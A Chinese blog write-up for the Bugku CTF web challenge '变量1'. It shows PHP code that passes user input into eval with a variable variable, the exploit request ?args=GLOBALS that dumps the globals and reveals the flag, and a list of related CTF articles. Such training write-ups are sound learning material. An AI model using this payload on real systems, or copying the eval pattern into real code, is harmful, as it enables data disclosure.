bugku 变量1

最新推荐文章于 2024-05-11 02:14:15 发布
最新推荐文章于 2024-05-11 02:14:15 发布
阅读量9.6k 收藏 2
点赞数 5
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/anjiaowangmenghan/article/details/76460872
版权
flag In the variable !  <?php  

error_reporting(0);
include "flag1.php";
highlight_file(__file__);
if(isset($_GET['args'])){
    $args $_GET['args'];
    if(!preg_match("/^\w+$/",$args)){
        die("args error!");
    }
    eval("var_dump($$args);");
}

?>

又是代码审计...

首先简单看了一下 没有发现什么有用的信息,之后注意到最后一行的eval("var_dump($$args);"); 注意了这地方有两个$$ 此处给大家一个书上的内容


看到这里大家应该就懂了 所以我们只需给变量传一个全局数组变量就好了 所以我们构造 ?args=GLOBALS加到网页后面

http://120.24.86.145:8004/index1.php?args=GLOBALS

便可得到FLAG

array(7) { ["GLOBALS"]=> *RECURSION* ["_POST"]=> array(0) { } ["_GET"]=> array(1) { ["args"]=> string(7) "GLOBALS" } ["_COOKIE"]=> array(0) { } ["_FILES"]=> array(0) { } ["ZFkwe3"]=> string(38) "flag{92853051ab894a64f7865cf3c2128b34}" ["args"]=> string(7) "GLOBALS" }

如有疑问请联系QQ834368404

俺叫王梦涵
关注
  • 5
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
$$a,PHP独有的可变变量
weixin_30814329的博客
03-24 245
所谓可变变量,就是一个变量变量名可以动态的设置和使用。语法形式是PHP的特殊语法,其他语言中少见 有时候使用可变变量名是很方便的。就是说,一个变量变量名可以动态的设置和使用。一个普通的变量通过声明来设置,例如: <?php $a = 'hello'; ?> 一个可变变量获取了一个普通变量的值作为这个可变变量变量名。在上面的例子中 hello 使用了两个美元符号(...
ctf bugku 变量1
qq_35191331的博客
08-12 3543
flag In the variable !  error_reporting(0); // 关闭php错误显示 include "flag1.php"; // 引入flag1.php文件代码 highlight_file(__file__); if(isset($_GET['args'])){ // 通过get方式传递 args变量才能执行if里面的代码     $args
2024年最全CTF BugKu平台——Crypto篇刷题记录(后续更新)_抄错的字符 ctf,2024年最新写得太好了
最新发布
2401_84281703的博客
05-11 721
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!】93道网络安全面试题内容实在太多,不一一截图了最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说
BugKuCTF WEB 变量1
无限迭代中......
07-07 505
http://123.206.87.240:8004/index1.php 题解: <?php error_reporting(0); include "flag1.php"; highlight_file(__file__); if(isset($_GET['args'])){ $args = $_GET['args']; if(!preg_match("/...
正则表达式/^\w+$/i的理解
coolpad9187的专栏
04-29 9614
/^\w+$/i 两个//表示开始和结束 ^表示开始字符串 $表示结束字符串 \w表示包含【a-z,A-Z, _ , 0-9】 +表示一个或者多个\w 后面的i表示不区分大小写,在此处没用,因为\w里已经包含了大小写。
BugKu 变量1
weixin_30415113的博客
10-08 332
题目链接 这是一道代码审计。 flag In the variable ! <?php error_reporting(0); include "flag1.php"; highlight_file(file); if(isset($_GET['args'])){ $args = $_GET['args']; if(!preg_match("/^\w+$/",$args)){ die("ar...
Go编程1-变量声明
01-08
Go语言的变量声明方式与C和C++语言有明显不同。对于变量声明,Go语言引入了关键字var,而类型信息放在变量名之后,示例如下: Var v1 int Var v2 string Var v3 [10] int //数组 Var v4 [] int //数组切片 Var v5 ...
postman变量使用1.docx
03-25
变量是计算机语言中能存储计算结果或能表示值的抽象概念,变量可以通过变量名访问;简单说变量是可以取不同值的符号。 借助变量,Postman可以实现业务逻辑与测试数据的分离,有助于用户创建健壮的测试用例。变量允许...
6 shell变量1
08-03
1. **变量命名规则**: - 变量名称允许由字母、数字和下划线组成,但不能以数字开头。 - 变量的默认类型是字符串,这意味着即使赋值为数字,它也会被视为文本。 - 赋值时,使用等号 `=`,但等号两边不能有空格。 ...
变量Variables)1
08-03
在编程语言中,变量是程序的基本构建块,用于存储数据。在Java这样的编程语言中,变量是用来表示数据的内存位置,这些数据可以随着时间变化。在本文中,我们将深入探讨变量的声明、作用以及自由变量和约束变量的区别...
Lua 变量
01-03
Lua 变量 变量在使用前,必须在代码中进行声明,即创建该变量。 编译程序执行代码之前编译器需要知道如何给语句变量开辟存储区,用于存储变量的值。 Lua 变量有三种类型:全局变量、局部变量、表中的域。 Lua 中的...
CTF-web 第十三部分 命令注入
热门推荐
iamsongyu的博客
11-25 1万+
一 、基本原理 命令注入指的是,利用没有验证过的恶意命令或代码,对网站或服务器进行渗透攻击。 注入有很多种,并不仅仅只有SQL注入。比如: 命令注入(Command Injection) Eval 注入(Eval Injection) 客户端脚本攻击(Script Insertion) 跨网站脚本攻击(Cross Site Scripting, XSS) SQL 注入攻击(SQL ...
var_dump()
xcmax
09-08 658
var_dump()方法是判断一个变量的类型与长度,并输出变量的数值,如果变量有值输的是变量的值并回返数据类型. 此函数显示关于一个或多个表达式的结构信息,包括表达式的类型与值。数组将递归展开值,通过缩进显示其结构。 http://www.php100.com/html/php/hanshu/2013/0905/4344.html
bugku代码审计——WP
Hydra的博客
10-30 1215
目录   1.extract变量覆盖 2. strcmp比较字符串 3.urldecode二次编码绕过 4.md5()函数 5.数组返回NULL绕过 6.弱类型整数大小比较绕过 7.sha()函数比较绕过 8. md5加密相等绕过 9.十六进制与数字比较 10. 变量覆盖 11.ereg正则%00截断 12.strpos数组绕过 13.数字验证正则绕过 1.extra...
CTF之Bugku 变量1
weixin_41607190的博客
10-04 284
原理:利用GET方式传进去的值,再利用eval()函数的漏洞执行,但实际上这道题关键是读懂这句代码eval(“var_dump($$args);”); 我们传进去的$args又作为一个新的变量放在var_dump()函数中执行。 再根据题目意思,我们把PHP的九大全局变量放进去 发现args=GLOBALS时,flag出现了 ...
Bugku—extract变量覆盖
王嘟嘟的博客
10-27 2667
0x00 前言 日常任务 2018年10月27日 题目 0x01 start 这是一道变量覆盖的题目。 我们先来看看代码 一般代码审计,以我现在的水平来看最重要的就是变量,然后就是这个变量的处理过程。 那么这里的关键点就是shiyan和flag这两个变量了。 只要我们让他们一致就ok了。 123.206.87.240:9009/1.php?flag=&amp;shiyan= 我们使用置空的方...
bugKu变量1
YenKoc的博客
10-20 177
重点:两个$$,这暗示着第二个$变量的值,作为第一个$的名称。 而且代码审计之后,发现只含有字母。 又暗示在变量中,那么猜想是在全局变量中,而php中全局变量是$GLOBALS。 ...
BugkuCTF(代码审计) WriteUp
CallMeSa1tyFish的博客
08-06 3661
代码审计部分 extract变量覆盖 题目 &amp;amp;amp;lt;?php $flag='xxx'; extract($_GET); if(isset($shiyan)) { $content=trim(file_get_contents($flag)); if($shiyan==$content){ echo'flag{xxx}'; }else{ ...
bugku ctf 变量1
qq_42777804的博客
08-13 2263
打开 进行分析 (大佬分析) flag In the variable ! &lt;?php   error_reporting(0);// 关闭php错误显示 include "flag1.php";// 引入flag1.php文件代码 highlight_file(__file__); if(isset($_GET['args'])){// 通过get方式传递 args变量才能执...
Bugku post
09-21
根据提供的引用内容,Bugku post是一个题目的要求,要求在两秒内提交一道很长的计算题答案,并且式子每次刷新都会变动。需要使用POST方式传入一个变量名为value的值。具体的解题步骤包括创建一个Python文件,导入requests库和re库,并且创建一个函数来处理POST请求和计算题答案。然后,使用循环来不断刷新题目,获取题目提示,并通过POST请求提交答案。最后,将提交的答案复制粘贴到提交框中完成题目的提交。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值